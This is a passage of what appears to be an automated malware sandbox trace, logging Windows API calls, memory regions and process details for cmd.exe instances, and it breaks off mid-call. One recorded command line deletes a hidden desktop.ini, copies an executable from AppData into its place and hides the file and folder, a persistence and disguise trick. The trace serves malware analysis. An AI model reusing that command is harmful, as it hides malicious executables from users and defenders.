[0192.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.886] GetFileType (hFile=0x4c) returned 0x1 [0192.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.886] WriteFile (in: hFile=0x4c, lpBuffer=0x18f170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f170*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.886] GetFileType (hFile=0x4c) returned 0x1 [0192.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.886] WriteFile (in: hFile=0x4c, lpBuffer=0x18f1c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f1c0*, lpNumberOfBytesWritten=0x18e1c4*=0x20, lpOverlapped=0x0) returned 1 [0192.886] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.886] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e1b0 | out: lpNewFilePointer=0x0) returned 1 [0192.886] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.886] ReadFile (in: hFile=0x54, lpBuffer=0x18efe0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e1d0, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesRead=0x18e1d0*=0x200, lpOverlapped=0x0) returned 1 [0192.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.886] GetFileType (hFile=0x4c) returned 0x1 [0192.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.886] GetFileType (hFile=0x4c) returned 0x1 [0192.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.886] WriteFile (in: hFile=0x4c, lpBuffer=0x18efe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.886] GetFileType (hFile=0x4c) returned 0x1 [0192.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.886] WriteFile (in: hFile=0x4c, lpBuffer=0x18f030*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f030*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.886] GetFileType (hFile=0x4c) returned 0x1 [0192.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.886] WriteFile (in: hFile=0x4c, lpBuffer=0x18f080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f080*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.887] GetFileType (hFile=0x4c) returned 0x1 [0192.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.887] WriteFile (in: hFile=0x4c, lpBuffer=0x18f0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f0d0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.887] GetFileType (hFile=0x4c) returned 0x1 [0192.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.887] WriteFile (in: hFile=0x4c, lpBuffer=0x18f120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f120*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.887] GetFileType (hFile=0x4c) returned 0x1 [0192.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.887] WriteFile (in: hFile=0x4c, lpBuffer=0x18f170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f170*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.887] GetFileType (hFile=0x4c) returned 0x1 [0192.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.887] WriteFile (in: hFile=0x4c, lpBuffer=0x18f1c0*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f1c0*, lpNumberOfBytesWritten=0x18e1c4*=0x20, lpOverlapped=0x0) returned 1 [0192.887] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.887] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e1b0 | out: lpNewFilePointer=0x0) returned 1 [0192.887] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.887] ReadFile (in: hFile=0x54, lpBuffer=0x18efe0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e1d0, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesRead=0x18e1d0*=0x200, lpOverlapped=0x0) returned 1 [0192.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.887] GetFileType (hFile=0x4c) returned 0x1 [0192.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.887] GetFileType (hFile=0x4c) returned 0x1 [0192.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.887] WriteFile (in: hFile=0x4c, lpBuffer=0x18efe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.888] GetFileType (hFile=0x4c) returned 0x1 [0192.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.888] WriteFile (in: hFile=0x4c, lpBuffer=0x18f030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f030*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.888] GetFileType (hFile=0x4c) returned 0x1 [0192.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.888] WriteFile (in: hFile=0x4c, lpBuffer=0x18f080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f080*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.888] GetFileType 
(hFile=0x4c) returned 0x1 [0192.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.888] WriteFile (in: hFile=0x4c, lpBuffer=0x18f0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f0d0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.888] GetFileType (hFile=0x4c) returned 0x1 [0192.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.888] WriteFile (in: hFile=0x4c, lpBuffer=0x18f120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f120*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.888] GetFileType (hFile=0x4c) returned 0x1 [0192.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.888] WriteFile (in: hFile=0x4c, lpBuffer=0x18f170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f170*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.888] GetFileType (hFile=0x4c) returned 0x1 [0192.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.888] WriteFile (in: hFile=0x4c, lpBuffer=0x18f1c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f1c0*, lpNumberOfBytesWritten=0x18e1c4*=0x20, lpOverlapped=0x0) returned 1 [0192.888] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.888] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e1b0 | out: lpNewFilePointer=0x0) returned 1 [0192.888] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.888] ReadFile (in: hFile=0x54, lpBuffer=0x18efe0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e1d0, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesRead=0x18e1d0*=0x200, lpOverlapped=0x0) returned 1 [0192.888] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0192.888] GetFileType (hFile=0x4c) returned 0x1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] GetFileType (hFile=0x4c) returned 0x1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] WriteFile (in: hFile=0x4c, lpBuffer=0x18efe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] GetFileType (hFile=0x4c) returned 0x1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] WriteFile (in: hFile=0x4c, lpBuffer=0x18f030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f030*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] GetFileType (hFile=0x4c) returned 0x1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] WriteFile (in: hFile=0x4c, lpBuffer=0x18f080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f080*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] GetFileType (hFile=0x4c) returned 0x1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] WriteFile (in: hFile=0x4c, lpBuffer=0x18f0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f0d0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] GetFileType (hFile=0x4c) returned 0x1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] WriteFile (in: hFile=0x4c, lpBuffer=0x18f120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f120*, 
lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] GetFileType (hFile=0x4c) returned 0x1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] WriteFile (in: hFile=0x4c, lpBuffer=0x18f170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f170*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] GetFileType (hFile=0x4c) returned 0x1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] WriteFile (in: hFile=0x4c, lpBuffer=0x18f1c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f1c0*, lpNumberOfBytesWritten=0x18e1c4*=0x20, lpOverlapped=0x0) returned 1 [0192.889] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.889] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e1b0 | out: lpNewFilePointer=0x0) returned 1 [0192.889] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.889] ReadFile (in: hFile=0x54, lpBuffer=0x18efe0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e1d0, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesRead=0x18e1d0*=0x200, lpOverlapped=0x0) returned 1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] GetFileType (hFile=0x4c) returned 0x1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] GetFileType (hFile=0x4c) returned 0x1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] WriteFile (in: hFile=0x4c, lpBuffer=0x18efe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] GetFileType (hFile=0x4c) returned 0x1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0192.890] WriteFile (in: hFile=0x4c, lpBuffer=0x18f030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f030*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] GetFileType (hFile=0x4c) returned 0x1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] WriteFile (in: hFile=0x4c, lpBuffer=0x18f080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f080*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] GetFileType (hFile=0x4c) returned 0x1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] WriteFile (in: hFile=0x4c, lpBuffer=0x18f0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f0d0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] GetFileType (hFile=0x4c) returned 0x1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] WriteFile (in: hFile=0x4c, lpBuffer=0x18f120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f120*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] GetFileType (hFile=0x4c) returned 0x1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] WriteFile (in: hFile=0x4c, lpBuffer=0x18f170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f170*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] GetFileType (hFile=0x4c) returned 0x1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] WriteFile (in: hFile=0x4c, 
lpBuffer=0x18f1c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f1c0*, lpNumberOfBytesWritten=0x18e1c4*=0x20, lpOverlapped=0x0) returned 1 [0192.890] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.890] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e1b0 | out: lpNewFilePointer=0x0) returned 1 [0192.890] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.890] ReadFile (in: hFile=0x54, lpBuffer=0x18efe0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e1d0, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesRead=0x18e1d0*=0x32, lpOverlapped=0x0) returned 1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] GetFileType (hFile=0x4c) returned 0x1 [0192.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.891] GetFileType (hFile=0x4c) returned 0x1 [0192.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.891] WriteFile (in: hFile=0x4c, lpBuffer=0x18efe0*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesWritten=0x18e1c4*=0x32, lpOverlapped=0x0) returned 1 [0192.891] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.891] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e1b0 | out: lpNewFilePointer=0x0) returned 1 [0192.891] _close (_FileHandle=4) returned 0 [0192.891] FindNextFileW (in: hFindFile=0x240e80, lpFindFileData=0x18f244 | out: lpFindFileData=0x18f244) returned 0 [0192.891] GetLastError () returned 0x12 [0192.891] FindClose (in: hFindFile=0x240e80 | out: hFindFile=0x240e80) returned 1 [0192.892] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0192.898] _close (_FileHandle=3) returned 0 [0192.899] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.899] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0192.899] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.899] GetConsoleMode (in: 
hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0192.899] _get_osfhandle (_FileHandle=0) returned 0x3 [0192.899] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0192.899] SetConsoleInputExeNameW () returned 0x1 [0192.899] GetConsoleOutputCP () returned 0x1b5 [0192.899] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0192.899] SetThreadUILanguage (LangId=0x0) returned 0x409 [0192.900] exit (_Code=0) Process: id = "436" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xa84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28324 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28325 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id 
= 28326 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28327 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 28328 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28329 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28330 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28331 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28332 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 28333 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28358 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28359 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28360 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28361 start_va = 
0x470000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 28362 start_va = 0x4c0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 28363 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28364 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28365 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28366 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28367 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28368 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28369 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28370 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" 
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28371 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28372 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 28373 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28374 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 28375 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 28376 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 28377 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 28378 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 28379 start_va = 0x310000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 28380 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 28381 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Region: id = 28406 start_va = 0x1330000 end_va = 0x15fefff 
entry_point = 0x1330000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 628 os_tid = 0xb64 [0192.814] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fcb4 | out: lpSystemTimeAsFileTime=0x30fcb4*(dwLowDateTime=0xa7cdad40, dwHighDateTime=0x1d440a9)) [0192.814] GetCurrentProcessId () returned 0xa84 [0192.814] GetCurrentThreadId () returned 0xb64 [0192.814] GetTickCount () returned 0x36cf5 [0192.814] QueryPerformanceCounter (in: lpPerformanceCount=0x30fcac | out: lpPerformanceCount=0x30fcac*=24960299763) returned 1 [0192.814] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0192.814] __set_app_type (_Type=0x1) [0192.814] __p__fmode () returned 0x76b331f4 [0192.814] __p__commode () returned 0x76b331fc [0192.815] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0192.815] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0192.815] GetCurrentThreadId () returned 0xb64 [0192.815] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb64) returned 0x38 [0192.815] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0192.815] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0192.815] SetThreadUILanguage (LangId=0x0) returned 0x409 [0192.815] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0192.815] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fc44 | out: phkResult=0x30fc44*=0x0) returned 0x2 [0192.815] VirtualQuery (in: lpAddress=0x30fc7b, lpBuffer=0x30fc14, dwLength=0x1c | out: 
